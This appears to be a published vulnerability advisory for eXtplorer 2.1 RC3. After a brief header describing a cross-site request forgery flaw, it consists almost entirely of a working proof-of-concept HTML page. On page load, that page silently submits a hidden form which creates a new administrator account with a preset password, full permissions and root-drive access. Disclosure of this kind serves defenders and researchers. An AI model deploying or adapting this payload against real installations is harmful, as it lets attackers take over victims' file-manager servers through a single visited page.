<!------------------------------------------------------------------------
# Software................eXtplorer 2.1 RC3
# Vulnerability...........Cross-site Request Forgery
# Threat Level............Low (1/5)
# Download................http://extplorer.sourceforge.net/
# Discovery Date..........4/5/2011
# Tested On...............Windows Vista + XAMPP
# ------------------------------------------------------------------------
# Author..................AutoSec Tools
# Site....................http://www.autosectools.com/
# Email...................John Leitch <john@autosectools.com>
# ------------------------------------------------------------------------
# 
# 
# --Description--
# 
# A cross-site request forgery vulnerability in eXtplorer 2.1 RC3 can be
# exploited to create a new admin.
# 
# 
# --PoC-->

<html>
    <body onload="document.forms[0].submit()">
        <form method="POST" action="http://localhost/extplorer/index.php">
            <input type="hidden" name="option" value="com_extplorer" />
            <input type="hidden" name="user" value="" />
            <input type="hidden" name="action" value="admin" />
            <input type="hidden" name="action2" value="adduser" />
            <input type="hidden" name="confirm" value="true" />
            <input type="hidden" name="nuser" value="new_admin" />
            <input type="hidden" name="pass1" value="Password1" />
            <input type="hidden" name="pass2" value="Password1" />
            <input type="hidden" name="home_dir" value="c:/" />
            <input type="hidden" name="home_url" value="http://localhost" />
            <input type="hidden" name="show_hidden" value="1" />
            <input type="hidden" name="no_access" value="" />
            <input type="hidden" name="permissions" value="7" />
            <input type="hidden" name="active" value="1" />
        </form>
    </body>
</html>